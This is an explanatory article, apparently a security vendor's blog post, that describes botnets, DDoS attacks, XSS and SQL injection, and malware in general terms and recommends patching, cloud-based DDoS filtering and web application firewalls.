You’re a target, and you should know it: dealing with today’s four most prevalent web threats
Not everyone washes their hands as often as they should. Disgusting, but true. As far as digital hygiene goes, it’s also true that not every computer user or administrator keeps up to date with software patches or uses layered defenses. This leaves lots of devices vulnerable to being hacked as well as being commandeered and added to a “botnet” - essentially the computer version of an undead horde from some zombie horror film. Except those zombies can gnaw on your flesh from across the globe by virtue of the Internet, and can be summoned in massive numbers within seconds.
Botnets: the swarm that can sting you
So really, they’re more like an army of killer robots. In fact, the term “botnet” is short for “robot network”. Botnets are swarms of compromised computers which take orders from cybercriminals, usually by running programs which automate a lot of the time-intensive manual command typing usually required for hacking into PCs and servers. This automation puts the “robot” in “botnet”.
So what can the bad guys do with a botnet? For starters, they can be unleashed to jam comment forums and email inboxes with spam messages. They can also be set upon a specific website or a range of IP addresses, scanning every page and service for vulnerabilities which the hackers can then exploit to gain access to sensitive data and then sell on the black market. Yet perhaps the most menacing threat from botnets is their ability to launch a specific type of crippling attack on targeted websites which utilizes their strength in numbers: the Distributed Denial of Service (DDoS) attack.
When data becomes a weapon: DDoS
DDoS attacks consist of a massive number of computers (that’s the “distributed” part) which sends so much traffic to a targeted website that the attack traffic uses up all the bandwidth, memory or processing power of the server running the site. With the server maxed out by dealing with all the traffic from the attack, it’s unable to process the legitimate web traffic from customers or other site visitors (the “denial of service”).
There are actually three main types of DDoS attacks. Volumetric attacks, as the name suggest, saturate the network bandwidth of the victim website due to the sheer volume of attack-generated traffic (many billions of bits per second). Protocol attacks, however, use specific types of data packets to consume all the resources of infrastructure such as load balancers or firewalls. Lastly, application layer attacks target operating system vulnerabilities with aim of crashing the web server. Due to their more targeted nature, application layer DDoS attacks require much less traffic (and thus smaller botnets) than the other two types.
Your main defense against DDoS attacks are filtering solutions which are able to identify and block the attack traffic while allowing legitimate traffic. Although on-premise infrastructure can be used for such filtering, the sheer scale of attack traffic encountered in real DDoS attacks almost always makes cloud-based solutions the better choice. While the bad guys have a few ways to make money off of the ability to knock your site offline like extorting ransom payments, or renting out their botnet to other cybercriminals, there are also a few ways they can line their pockets while your site is fully functional.
Code injection attacks
Cross-site scripting attacks (XSS) are one way. A perpetrator can inject a website with a malicious script which remains on the website and gets activated by each subsequent visitor to that site. When the code runs, it causes the session cookies of those visitors to be sent to the perpetrator, who can then access that visitor’s account using their credentials, pilfering addresses and other personal information which could then be sold on the black market. A common tool for combating XSS threats is a web application firewall (WAF) from a vendor such as Incapsula. WAFs can intelligently block XSS attempts right at the injection stage, preventing malicious scripts from being placed on your web server.
Like XSS attacks, SQL injection attacks use code uploaded from an attacker onto a legitimate website, with the aim of extracting information. And, like XSS threats, WAFs are a popular tool for blocking them. There is one key difference though: whereas XSS attacks seek to steal web visitor information, attackers who use SQL injection set their sights higher: personal identifiable information (PII) on every user account of the site, valuable and confidential intellectual property and other sensitive company data.
This comprehensive haul is made possible by the fact that the central SQL database behind a site like an ecommerce store is very often integrated with other company systems.
Breaking bad (code): malware
Lastly, there’s malware: the umbrella term which includes things ransomware, worms, Trojans, and rootkits. These packages of pain can latch onto your website if someone clicks a link in a legitimate-looking but actually fraudulent email through which server admin credentials are pilfered (i.e. phishing), through a computer virus which has spread to a machine connected to the server, or any one of a dozen of other methods.
Deploying a WAF to guard your server can greatly decrease the likelihood that any of these techniques will work. Furthermore, a WAF would be able to detect the malware communication traffic to and from already-infected systems, allowing you to mitigate the impact of attacks in progress.
All of these four threats can cause huge financial headaches for your customers, as well as costly damage to your brand’s reputation and lost customer trust. Don’t want to be the next Equifax? Then keep your systems patched, and also take a look at the aforementioned mitigating solutions.